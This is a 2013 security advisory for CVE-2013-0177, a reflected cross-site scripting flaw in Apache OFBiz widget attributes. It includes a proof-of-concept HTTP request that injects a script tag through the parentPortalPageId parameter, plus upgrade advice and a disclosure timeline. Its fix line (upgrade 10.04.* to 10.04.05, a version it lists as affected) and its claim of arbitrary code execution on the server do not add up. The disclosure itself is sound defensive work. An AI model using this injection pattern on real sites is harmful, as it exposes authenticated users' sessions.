Apache OFBiz versions 10.04.05 and below and 11.04.01 and below suffer from a reflected cross site scripting vulnerability. Full exploitation details provided.
de3b53f54188361189213bbc769aa0b03d6bdceb3374bb700d55cbda2a8f3328
Title: Cross-Site Scripting (XSS) Vulnerability in Apache OFBiz
Type: Remote
Author: Juan Caillava (@jcaillava) / Marcos Garcia (@artsweb)
CVE: CVE-2013-0177
Impact: Direct execution of arbitrary code in the context of Webserver user.
Release Date: 18.01.2013
Summary
=======
Apache Open For Business (Apache OFBiz) is an open source enterprise
resource planning (ERP) system. It provides a suite of enterprise
applications that integrate and automate many of the business processes of
an enterprise.
Description
===========
Reflected Cross-Site Scripting Vulnerability affecting Screenlet.title and
Image.alt Widget attributes because the content of these two elements is
not properly escaped.
Vendor
======
Apache ofbiz - http://ofbiz.apache.org/
PoC
===
It is worth mentioning that originally the resource was using the HTTP
method POST, but it was changed to GET to exploit it more easily.
Something important to remark is that for this attack to work, the victim
should be authenticated.
Below you can see how the URL is specially crafted to expose the issue:
Affected URL: https://10.10.10.14:8443/exampleext/control/ManagePortalPages->
parameter: parentPortalPageId==[XSS]
GET
/exampleext/control/ManagePortalPages?parentPortalPageId=EXAMPLE"><script>alert("xss")</script>
HTTP/1.1
Host: 10.10.10.14:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101
Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ar,es;q=0.8,en-us;q=0.5,en;q=0.3
Connection: keep-alive
Referer:
https://10.10.10.14:8443/exampleext/control/main?externalLoginKey=EL367731470037
Cookie: JSESSIONID=C3E2C59FDC670DC004A562861681C092.jvm1;
OFBiz.Visitor=10002
Solution
========
10.04.* users should upgrade to 10.04.05
11.04.01 users should upgrade to 11.04.02
Vendor Status
=============
[08.01.2013] Vulnerability discovered.
[09.01.2013] Vendor informed.
[09.01.2013] Vendor replied.
[12.01.2013] Vendor reveals patch release date.
[18.01.2013] Public advisory.